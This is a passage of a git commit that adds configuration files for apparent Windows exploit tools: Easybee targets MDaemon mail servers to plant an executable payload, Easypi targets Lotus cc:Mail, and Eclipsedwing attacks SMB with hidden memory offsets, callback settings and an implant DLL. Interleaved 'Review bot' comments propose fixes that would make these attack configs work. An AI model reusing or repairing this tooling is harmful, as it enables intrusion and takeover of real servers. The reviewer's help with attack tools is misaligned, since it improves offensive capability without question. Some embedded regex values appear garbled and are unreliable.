This commit is contained in:
commit
bc8ff5f44a
6520 changed files with 426985 additions and 0 deletions
8
windows/exploits/Easybee-1.0.1.0.fb
Normal file
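--- a/windows/exploits/Easybee-1.0.1.0.fb
+++ b/windows/exploits/Easybee-1.0.1.0.fb
@@ -0,0 +1,8 @@
+<?xml version="1.0"?>
+<t:config id="d9d52d9866d564e35cfcd46994b1a0882546df0e"
+name="Easybee"
+version="1.0.1"
+configversion="1.0.1.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+</t:config>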
201
windows/exploits/Easybee-1.0.1.0.xml
Normal file
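--- a/windows/exploits/Easybee-1.0.1.0.xml
+++ b/windows/exploits/Easybee-1.0.1.0.xml
@@ -0,0 +1,201 @@
+<?xml version="1.0"?>
+<t:config id="d9d52d9866d564e35cfcd46994b1a0882546df0e"
+name="Easybee"
+version="1.0.1"
+configversion="1.0.1.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+
+<t:inputparameters>
+
+<!-- Parameters for specific versions -->
+<!--
+//versionspecificGetInbox - Seemingly fixed string appended to URL to select the Inbox
+//For 9.6.x: "View=List&ContentType=javascript&ReturnJavaScript=1&FolderID=1&Page=0¤tRequest=0"
+// could use: "View=List&Folder=Inbox"
+//For 10.0.x: "view=List&ReturnJavaScript=1&FolderID=0&ReturnDif=Yes&XMLHTTP=1"
+
+//versionspecificGetMsgID - Give it a subject-line identifier string, it selects the message identifier number
+//There are two observed formats. One appears to come from the "diff" response, and the other from the "full" response.
+//M({n:4, i:1, unr:1, del:0, att:0, urg:0, bnw:0, frw:0, rpl:0, frm:"joe shmoo", sbj:"Autoresponder Trigger 0188439095", dt:"03/16/2009 10:53 AM", sz:9});
+//scripts.push({id:2, i:0, unr:1, del:0, att:0, urg:0, bnw:1, frw:0, rpl:0, frm:"Joe Shmoo", sbj:"Autoresponder Trigger 1025304777", dt:"01/08/2009 03:01 PM", sz:4,depth:0, hasChildren:0});
+//use: <t:parameter name="versionspecificGetMsgID" description="" type="String" value="\({[^\n})]*\b(?:id|n):([0-9]+),[^\n})]*\bsbj:"%s"[^\n})]*}\);" hidden="true" />
+
+//also,
+//<td><a name="3" href="/WorldClient.dll?Session=PXTSWDE&View=Message&Number=3&Page=1"><strong>Autoresponder Trigger xKwwQoQwG1</strong></a></td>
+//use: View=Message&(?:amp;)*Number=([0-9]+)&(?:amp;)*Page=[0-9]*#x22;[^>]*>[^<]*<strong>%s</strong>
+-->
+<t:paramchoice name="WorldClientVersion" description="The version of WorldClient used by the target">
+
+<t:paramgroup name="9.5.2" description="">
+<t:parameter name="versionspecificGetInbox" description="" type="String" value="View=List&amp;amp;ContentType=javascript&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=1&amp;amp;Page=0&amp;amp;currentRequest=0" hidden="true" />
+<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
+</t:paramgroup>
+
+<t:paramgroup name="9.6.0" description="">
+<t:parameter name="versionspecificGetInbox" description="" type="String" value="View=List&amp;amp;ContentType=javascript&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=1&amp;amp;Page=0&amp;amp;currentRequest=0" hidden="true" />
+<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
+</t:paramgroup>
+<t:paramgroup name="9.6.1" description="">
+<t:parameter name="versionspecificGetInbox" description="" type="String" value="View=List&amp;amp;ContentType=javascript&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=1&amp;amp;Page=0&amp;amp;currentRequest=0" hidden="true" />
+<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
+</t:paramgroup>
+<t:paramgroup name="9.6.2" description="">
+<t:parameter name="versionspecificGetInbox" description="" type="String" value="View=List&amp;amp;ContentType=javascript&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=1&amp;amp;Page=0&amp;amp;currentRequest=0" hidden="true" />
+<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
+</t:paramgroup>
+<t:paramgroup name="9.6.3" description="">
+<t:parameter name="versionspecificGetInbox" description="" type="String" value="View=List&amp;amp;ContentType=javascript&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=1&amp;amp;Page=0&amp;amp;currentRequest=0" hidden="true" />
+<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
+</t:paramgroup>
+<t:paramgroup name="9.6.4" description="">
+<t:parameter name="versionspecificGetInbox" description="" type="String" value="View=List&amp;amp;ContentType=javascript&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=1&amp;amp;Page=0&amp;amp;currentRequest=0" hidden="true" />
+<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
+</t:paramgroup>
+<t:paramgroup name="9.6.5" description="">
+<t:parameter name="versionspecificGetInbox" description="" type="String" value="View=List&amp;amp;ContentType=javascript&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=1&amp;amp;Page=0&amp;amp;currentRequest=0" hidden="true" />
+<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
+</t:paramgroup>
+<t:paramgroup name="9.6.6" description="">
+<t:parameter name="versionspecificGetInbox" description="" type="String" value="View=List&amp;amp;ContentType=javascript&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=1&amp;amp;Page=0&amp;amp;currentRequest=0" hidden="true" />
+<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
+</t:paramgroup>
+
+<!--This program does not work on Version 10.0.0, but the input parameters are the same as the other 10.0.x versions-->
+<t:paramgroup name="10.0.1" description="">
+<t:parameter name="versionspecificGetInbox" description="" type="String" value="view=List&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=0&amp;amp;ReturnDif=Yes&amp;amp;XMLHTTP=1" hidden="true" />
+<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
+</t:paramgroup>
+<t:paramgroup name="10.0.2" description="">
+<t:parameter name="versionspecificGetInbox" description="" type="String" value="view=List&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=0&amp;amp;ReturnDif=Yes&amp;amp;XMLHTTP=1" hidden="true" />
+<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
+</t:paramgroup>
+<t:paramgroup name="10.0.3" description="">
+<t:parameter name="versionspecificGetInbox" description="" type="String" value="view=List&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=0&amp;amp;ReturnDif=Yes&amp;amp;XMLHTTP=1" hidden="true" />
+<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
+</t:paramgroup>
+<t:paramgroup name="10.0.4" description="">
+<t:parameter name="versionspecificGetInbox" description="" type="String" value="view=List&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=0&amp;amp;ReturnDif=Yes&amp;amp;XMLHTTP=1" hidden="true" />
+<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
+</t:paramgroup>
+<t:paramgroup name="10.0.5" description="">
+<t:parameter name="versionspecificGetInbox" description="" type="String" value="view=List&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=0&amp;amp;ReturnDif=Yes&amp;amp;XMLHTTP=1" hidden="true" />
+<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
+</t:paramgroup>
+
+<t:paramgroup name="10.1.0" description="">
+<t:parameter name="versionspecificGetInbox" description="" type="String" value="view=List&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=0&amp;amp;ReturnDif=Yes&amp;amp;XMLHTTP=1" hidden="true" />
+<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
+</t:paramgroup>
+<t:paramgroup name="10.1.1" description="">
+<t:parameter name="versionspecificGetInbox" description="" type="String" value="view=List&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=0&amp;amp;ReturnDif=Yes&amp;amp;XMLHTTP=1" hidden="true" />
+<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
+</t:paramgroup>
+<t:paramgroup name="10.1.2" description="">
+<t:parameter name="versionspecificGetInbox" description="" type="String" value="view=List&amp;amp;ReturnJavaScript=1&amp;amp;FolderID=0&amp;amp;ReturnDif=Yes&amp;amp;XMLHTTP=1" hidden="true" />
+<t:parameter name="versionspecificGetMsgID" description="" type="String" value="(?:(?:\({[^\n})]*\b(?:id|n):)|(?:View=Message&amp;amp;amp;*Number=))([0-9]+)(?:(?:,[^\n})]*\bsbj:"%s"[^\n})]*}\);)|(?:&amp;amp;amp;*Page=[0-9]*"[^>]*>[^<]*<strong>%s</strong>))" hidden="true" />
+</t:paramgroup>
+
+</t:paramchoice>
+
+<!-- Parameters for the target machine -->
+<t:parameter name="TargetIp" type="IPv4" description="Target IPv4 Address (dot notation)" />
+<t:parameter name="TargetWCPort" type="TcpPort" description="Target Port Number for WorldClient connection" />
+<t:parameter name="TargetWAPort" type="TcpPort" description="Target Port Number for WebAdmin connection" />
+
+<!-- Parameters for the WorldClient server -->
+<t:parameter name="WorldClientProtocol" type="String" description="WorldClient Protocol (http, https)" binding="//service[product/name='MDaemon WorldClient']/name" /> <!-- Replace this with an explicit choice of only "http" or "https" -->
+<t:parameter name="WorldClientDomain" type="String" description="WorldClient Address (domain name or IP address)" binding="//identifier" />
+<t:parameter name="WorldClientPort" type="TcpPort" description="WorldClient Port Number" binding="//service[product/name='MDaemon WorldClient']/port" />
+
+<!-- Parameters for the WebAdmin server -->
+<t:parameter name="WebAdminProtocol" type="String" description="WebAdmin Protocol (http, https)" binding="//service[product/name='MDaemon WebAdmin']/name" /> <!-- Replace this with an explicit choice of only "http" or "https" -->
+<t:parameter name="WebAdminDomain" type="String" description="WebAdmin Address (domain name or IP address)" binding="//identifier" />
+<t:parameter name="WebAdminPort" type="TcpPort" description="WebAdmin Port Number" binding="//service[product/name='MDaemon WebAdmin']/port" />
+
+<!-- Parameters for the target account -->
+<t:parameter name="TargetAcctDomain" type="String" description="Target account email domain"/>
+<t:parameter name="TargetAcctUsr" type="String" description="Target account username"/>
+<t:parameter name="TargetAcctPwd" type="String" description="Target account password"/>
+<t:parameter name="TargetAcctIsAdmin" type="String" description="Target account administrator status"/>
+
+<!-- Parameters for the email triggering the content filter -->
+<t:parameter name="CFEmailFrom" type="String" description="Asserted sender for email triggering the content filter"/>
+<t:parameter name="CFEmailSubj" type="String" description="Subject line for email triggering the content filter"/>
+<t:parameter name="CFEmailFile" type="String" description="Filename of attachment (executable payload) on email triggering the content filter"/>
+
+<!-- Parameters for the email triggering the auto responder -->
+<t:parameter name="AREmailFrom" type="String" description="Asserted sender for email triggering the auto responder"/>
+<t:parameter name="AREmailSubj" type="String" description="Subject line for email triggering the auto responder"/>
+
+<!-- Parameters for the (pass through) email not triggering the content filter of auto responder -->
+<t:parameter name="PTEmailFrom" type="String" description="Asserted sender for email ignored by content filter"/>
+<t:parameter name="PTEmailSubj" type="String" description="Subject line for email ignored by content filter"/>
+
+<!-- Parameters for the payload -->
+<t:parameter name="PayloadName" type="String" description="Filename for executable payload once on the target"/>
+<t:parameter name="PayloadFile" type="String" description="Path to payload to be uploaded to the target"/>
+
+</t:inputparameters>
+
+<t:redirection>
+<t:local protocol="TCP"
+listenaddr="TargetIp"
+listenport="TargetWCPort"
+destaddr="//identifier"
+destport="//service[product/name='MDaemon WorldClient']/port"
+closeoncompletion="true"/>
+<t:local protocol="TCP"
+listenaddr="TargetIp"
+listenport="TargetWAPort"
+destaddr="//identifier"
+destport="//service[product/name='MDaemon WebAdmin']/port"
+closeoncompletion="true"/>
+</t:redirection>
+
+<t:logic>
+<t:and>
+
+<t:or>
+<t:service name="https">
+<t:product name="MDaemon WorldClient" />
+<!--
+<t:bindtovalue name="WorldClientProtocol" value="https"/>
+<t:bindtopath name="WorldClientDomain" path="//identifier"/>
+<t:bindtopath name="WorldClientPort" path="//service[product/name='MDaemon WorldClient']/port"/>
+-->
+</t:service>
+
+<t:service name="http">
+<t:product name="MDaemon WorldClient" />
+<!--
+<t:bindtovalue name="WorldClientProtocol" value="http"/>
+<t:bindtopath name="WorldClientDomain" path="//identifier"/>
+<t:bindtopath name="WorldClientPort" path="//service[product/name='MDaemon WorldClient']/port"/>
+-->
+</t:service>
+</t:or>
+
+<t:or>
+<t:service name="https">
+<t:product name="MDaemon WebAdmin" />
+<!--
+<t:bindtovalue name="WebAdminProtocol" value="https"/>
+<t:bindtopath name="WebAdminDomain" path="//identifier"/>
+<t:bindtopath name="WebAdminPort" path="//service[product/name='MDaemon WebAdmin']/port"/>
+-->
+</t:service>
+
+<t:service name="http">
+<t:product name="MDaemon WebAdmin" />
+<!--
+<t:bindtovalue name="WebAdminProtocol" value="http"/>
+<t:bindtopath name="WebAdminDomain" path="//identifier"/>
+<t:bindtopath name="WebAdminPort" path="//service[product/name='MDaemon WebAdmin']/port"/>
+-->
+</t:service>
+</t:or>
+
+</t:and>
+</t:logic>
+</t:config>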
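Review bot: The `versionspecificGetMsgID` values (first in the 9.5.2 group, repeated in every group) do not agree with the intended pattern given in the header comment: the comment's `View=Message&(?:amp;)*Number=` appears in the value as `View=Message&amp;amp;amp;*Number=`, and no number of entity decodes turns that into `&(?:amp;)*` (it ends as a literal `&amp` followed by `;*`), so the plain `&Number=` form of the link would not match; the same value also shows a bare `"` after `Page=[0-9]*` inside a double-quoted attribute. This may be an artefact of how the page rendered entities, so check the raw file: the attribute should decode to `View=Message&(?:amp;)*Number=` and the inner quotes must be `&quot;` for the XML to parse. Separately, `TargetAcctPwd` is an ordinary visible `String` while the internal regexes are marked `hidden="true"`; if the schema has no secret type, at least mark it with `<!-- credential: do not log or echo in the UI -->`. The twelve per-version groups carry two identical values each; a one-line comment stating which groups are meant to be identical would make a future silent divergence obvious.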
BIN
windows/exploits/Easybee-1.0.1.exe
Normal file
BIN
windows/exploits/Easybee-1.0.1.exe
Normal file
Binary file not shown.
8
windows/exploits/Easypi-3.1.0.0.fb
Normal file
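--- a/windows/exploits/Easypi-3.1.0.0.fb
+++ b/windows/exploits/Easypi-3.1.0.0.fb
@@ -0,0 +1,8 @@
+<?xml version="1.0"?>
+<t:config id="b262fec9933caa4d9cdb704b916bb3ffd8269450"
+name="Easypi"
+version="3.1.0"
+configversion="3.1.0.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+</t:config>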
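Review bot: The `id` here, `b262fec9933caa4d9cdb704b916bb3ffd8269450`, differs from the `id` in Easypi-3.1.0.0.xml (`c72514379eaad943b62f4080a5ae1dc61619f0f3`), whereas the Easybee and Eclipsedwing .fb/.xml pairs in this commit share one id each. If the framework pairs the two files by id, this stub will not match its config; confirm which value is current and make both files agree.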
67
windows/exploits/Easypi-3.1.0.0.xml
Normal file
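--- a/windows/exploits/Easypi-3.1.0.0.xml
+++ b/windows/exploits/Easypi-3.1.0.0.xml
@@ -0,0 +1,67 @@
+<?xml version="1.0"?>
+<t:config id="c72514379eaad943b62f4080a5ae1dc61619f0f3"
+name="Easypi"
+version="3.1.0"
+configversion="3.1.0.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+<t:inputparameters>
+<!-- All plugins that accept a callback must have the Callback* parameters
+listed below, or their equivalents. -->
+<t:parameter name="NetworkTimeout"
+description="Timeout for blocking network calls (in seconds). Use -1 for no timeout."
+type="S16"
+default="180"/>
+<t:parameter name="TargetIp"
+description="Target IP Address"
+type="IPv4"/>
+<t:parameter name="TargetPort"
+description="Port used by ccMail"
+type="TcpPort"
+default="3264"/>
+<t:parameter name="Connections"
+description="Number of parallel connections to attempt"
+type="S32"
+default="20"/>
+</t:inputparameters>
+
+<t:outputparameters>
+<t:parameter name="ConnectedTcp"
+description="Connected TCP Socket to target"
+type="Socket"/>
+<t:parameter name="Contract"
+description="Plugin contract"
+type="String"
+value="StagedUpload" />
+<t:parameter name="XorMask"
+description=""
+type="U8"/>
+</t:outputparameters>
+
+<t:redirection>
+<t:local protocol="TCP"
+listenaddr="TargetIp"
+listenport="TargetPort"
+destaddr="//identifier"
+destport="//service[name='ccmail']/port"
+closeoncompletion="true"/>
+<t:remote protocol="TCP"
+listenaddr="CallbackIp"
+listenport="CallbackPort"
+destport="CallbackLocalPort"/>
+</t:redirection>
+
+<t:logic>
+<t:and>
+<t:service name="ccmail">
+<t:product name="Lotus cc:Mail"/>
+</t:service>
+<t:or>
+<t:os family="windows" name="Windows NT"/>
+<t:os family="windows" name="Windows 2000"/>
+<t:os family="windows" name="Windows XP"/>
+<t:os family="windows" name="Windows 2003"/>
+</t:or>
+</t:and>
+</t:logic>
+</t:config>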
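Review bot: The `<t:remote>` redirection refers to `CallbackIp`, `CallbackPort` and `CallbackLocalPort`, but `<t:inputparameters>` declares none of them, despite its own comment that every callback-accepting plugin must list the Callback* parameters; as written the remote listener has no operator-supplied values to bind to. Either add the three parameters as Eclipsedwing-1.5.2.0.xml does (`<t:parameter name="CallbackIp" description="Callback IP address" type="IPv4"/>` plus `CallbackPort` and `CallbackLocalPort` as `TcpPort`), or, if this plugin's contract is listen-only, drop the `<t:remote>` element and fix the comment. The `XorMask` output parameter has an empty `description`; state what consumes it, presumably the staged-upload stage named in `Contract`, but confirm before writing that down.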
BIN
windows/exploits/Easypi-3.1.0.exe
Normal file
BIN
windows/exploits/Easypi-3.1.0.exe
Normal file
Binary file not shown.
31
windows/exploits/Eclipsedwing-1.5.2.0.fb
Normal file
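--- a/windows/exploits/Eclipsedwing-1.5.2.0.fb
+++ b/windows/exploits/Eclipsedwing-1.5.2.0.fb
@@ -0,0 +1,31 @@
+<?xml version="1.0"?>
+<t:config id="def84fcfbc30f146f982bf43d536f300bf2e6485"
+name="Eclipsedwing"
+version="1.5.2"
+configversion="1.5.2.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+
+<t:touchlist>
+<t:plugin name="Rpctouch"
+displayname="RPC Touch"
+description="Touch to get Target OS"
+postmessage="ECWI requires Target OS">
+<t:ivparam name="TargetPort" value="TargetPort"/>
+<t:ivparam name="TargetIp" value="TargetIp"/>
+<t:ivparam name="Protocol" value="Protocol"/>
+<t:ivparam name="NetworkTimeout" value="NetworkTimeout"/>
+<t:oparam name="Target" value="Target"/>
+<t:oparam name="Protocol" value="Protocol"/>
+</t:plugin>
+<t:plugin name="Eclipsedwingtouch"
+displayname="ECWI Vulnerability Touch"
+description="Check if Target is vulnerable to ECWI"
+postmessage="ECWI requires vulnerable target">
+<t:ivparam name="TargetPort" value="TargetPort"/>
+<t:ivparam name="TargetIp" value="TargetIp"/>
+<t:ivparam name="Protocol" value="Protocol"/>
+<t:ivparam name="NetworkTimeout" value="NetworkTimeout"/>
+</t:plugin>
+</t:touchlist>
+</t:config>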
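Review bot: `Protocol` is passed into Rpctouch as an ivparam and also taken back from it as an oparam, so the touch can rewrite the operator's SMB/NBT choice before Eclipsedwingtouch reads `Protocol` as its own ivparam, and nothing in the file says whether that is intended. Add a comment on the oparam, e.g. `<!-- Rpctouch may replace the operator's Protocol with whichever transport the target actually answered on -->`, or remove that oparam if the operator's choice is meant to stick. The `Target` oparam is not consumed by Eclipsedwingtouch; that is fine if the framework hands it to the exploit itself, but a one-line comment saying so would save the next reader the guess.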
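--- a/windows/exploits/Eclipsedwing-1.5.2.0.xml
+++ b/windows/exploits/Eclipsedwing-1.5.2.0.xml
@@ -0,0 +1,341 @@
+<?xml version="1.0"?>
+<t:config id="def84fcfbc30f146f982bf43d536f300bf2e6485"
+name="Eclipsedwing"
+version="1.5.2"
+configversion="1.5.2.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+
+<t:inputparameters>
+
+<t:parameter name="TargetIp" description="Target IP Address" type="IPv4" />
+<t:parameter name="TargetPort"
+description="Port used by Netbios or SMB"
+type="TcpPort" />
+<t:paramchoice name="Protocol" description="Protocol to connect to target with">
+<t:paramgroup name="SMB" description="SMB over TCP"/>
+<t:paramgroup name="NBT" description="Netbios over TCP"/>
+</t:paramchoice>
+<t:parameter name="NetworkTimeout"
+description="Timeout for blocking network calls (in seconds). Use -1 for no timeout."
+type="S16"
+default="60"/>
+
+<t:parameter name="ClientName"
+description="Client SMB Name"
+type="String"
+hidden="true"
+default="*SMBCLIENT"/>
+<t:parameter name="ServerName"
+description="Server SMB name"
+type="String"
+hidden="true"
+default="*SMBSERVER"/>
+<t:paramchoice name="Payload" description="Listen or Callback paylaod" default="Callback">
+<t:paramgroup name="Callback" description="Callback payload">
+
+<t:parameter name="CallbackIp" description="Callback IP address" type="IPv4"/>
+<t:parameter name="CallbackPort" description="Callback port" type="TcpPort" default="0"/>
+<t:parameter name="CallbackLocalPort" description="Local callback port" type="TcpPort" required="false"/>
+</t:paramgroup>
+<t:paramgroup name="RPCReuse" description="RPC Proxy payload">
+<t:parameter name="FbStorage"
+description="base path to implant payload dll"
+type="String"/>
+<t:parameter name="PayloadDll"
+description="implant payload dll name"
+type="String"
+default="wbemess2.dll"/>
+</t:paramgroup>
+<!--
+<t:paramgroup name="Listener" description="Listener payload">
+<t:parameter name="ListenPort" description="Listen port" type="TcpPort" default="0"/>
+<t:parameter name="CallinPort" description="Call in port" type="TcpPort" default="0"/>
+<t:parameter name="CallinTimeout" description="Timeout to wait before trying to connect in." type="S16" default="60"/>
+</t:paramgroup>
+-->
+</t:paramchoice>
+
+<t:parameter name="PrefixLength" description="" type="U32" value="0xB8" hidden="true"/>
+<t:parameter name="BufferLength" description="" type="U32" value="0xFA0" hidden="true"/>
+<t:parameter name="ProcHandleOffset" description="" type="U32" value="0x08" hidden="true"/>
+<t:parameter name="ProcHandleOffset2" description="" type="U32" value="0x34" hidden="true"/>
+<t:parameter name="ProcHandleValue" description="" type="U32" value="0xFFFFFFFF" hidden="true"/>
+
+<!-- the 0x0C offset is set from InitialEcxValue -->
+<t:parameter name="PtrRwSizeOffset" description="" type="U32" value="0x10" hidden="true"/>
+<t:parameter name="PtrRwSizeOffset2" description="" type="U32" value="0x3C" hidden="true"/>
+<t:parameter name="ExeFlagsOffset" description="" type="U32" value="0x14" hidden="true"/>
+<t:parameter name="ExeFlagsOffset2" description="" type="U32" value="0x40" hidden="true"/>
+<t:parameter name="ExeFlagsValue" description="" type="U32" value="0x00000040" hidden="true"/>
+<t:parameter name="UnpatchedRetOffset" description="" type="U32" value="0x1C" hidden="true"/>
+<t:parameter name="UnpatchedEcxOffset" description="" type="U32" value="0x20" hidden="true"/>
+<t:parameter name="PatchedEcxOffset" description="" type="U32" value="0x28" hidden="true"/>
+<t:parameter name="CommonRetOffset" description="" type="U32" value="0x24" hidden="true"/>
+<t:parameter name="LoadEaxPtrOffset" description="" type="U32" value="0x2C" hidden="true"/>
+<t:parameter name="LoadEaxPtrOffset2" description="" type="U32" value="0x70" hidden="true"/>
+<t:parameter name="EaxPtrOffset" description="" type="U32" value="0x30" hidden="true"/>
+<t:parameter name="AddEaxPtrEdxOffset" description="" type="U32" value="0x38" hidden="true"/>
+<t:parameter name="EbxToWriteableOffset" description="" type="U32" value="0x48" hidden="true"/>
+<t:parameter name="EbxPtrOffset" description="" type="U32" value="0x54" hidden="true"/>
+<t:parameter name="MovHeapPtrToEcxOffset" description="" type="U32" value="0x58" hidden="true"/>
+<t:parameter name="EaxNegValOffset" description="" type="U32" value="0x84" hidden="true"/>
+<t:parameter name="MovEcxEspOffset" description="" type="U32" value="0x8C" hidden="true"/>
+<t:parameter name="HeapRetAddrOffset" description="" type="U32" value="0x98" hidden="true"/>
+<t:parameter name="HeapRetAddrOffset2" description="" type="U32" value="0x20" hidden="true"/>
+<t:parameter name="HeapRetEbxOffset" description="" type="U32" value="0x68" hidden="true"/>
+<t:parameter name="HeapRetEbpOffset" description="" type="U32" value="0x88" hidden="true"/>
+<t:parameter name="HeapRetEsiOffset" description="" type="U32" value="0x40" hidden="true"/>
+<t:parameter name="PtrPtrHeapOffset" description="" type="U32" value="0x0C" hidden="true"/> <!-- used in buffer, not prefix - will be InitialEcxValue + 4 -->
+<t:parameter name="PtrPtrHeapOffset2" description="" type="U32" value="0x38" hidden="true"/> <!-- used in buffer, not prefix - will be InitialEcxValue + 4 -->
+<t:parameter name="GetExecutionToBufferOffset" description="" type="U32" value="0x04" hidden="true"/>
+<t:parameter name="GetExecutionToBufferOffset2" description="" type="U32" value="0x30" hidden="true"/>
+<t:parameter name="WriteMemoryOffset" description="" type="U32" value="0x18" hidden="true"/>
+<t:parameter name="WriteMemoryOffset2" description="" type="U32" value="0x44" hidden="true"/>
+<t:parameter name="WriteMemoryOffset3" description="" type="U32" value="0x1C" hidden="true"/>
+<t:parameter name="CallEcxOffset" description="" type="U32" value="0x4c" hidden="true"/>
+<t:parameter name="HeapRetEbxValue" description="" type="U32" value="0x7ffe0300" hidden="true"/> <!-- address of kernel32.dll import of NtProtectVirtualMemory -->
+
+
+<t:paramchoice name="Target" description="Operating System, Service Pack, and Language of target OS">
+<t:paramgroup name="W2K" description="Windows 2000 All">
+<t:parameter name="xor_key_reg" description="" type="U8" value="0x55" hidden="true"/>
+<t:parameter name="initial_eax_val" description="" type="U32" value="0xfffffc17" hidden="true"/>
+<t:parameter name="sub_eax_val" description="" type="U32" value="0xffffff34" hidden="true"/>
+<t:parameter name="NoNX" description="" type="Boolean" value="true" hidden="true"/>
+<t:parameter name="CallESP" description="" type="U32" value="0x001f10c8" hidden="true"/>
+</t:paramgroup>
+
+<!-- These next 3 are all the same -->
+<t:paramgroup name="XPSP0" description="Windows XP, Service Pack 0">
+<t:parameter name="xor_key_reg" description="" type="U8" value="0x51" hidden="true"/>
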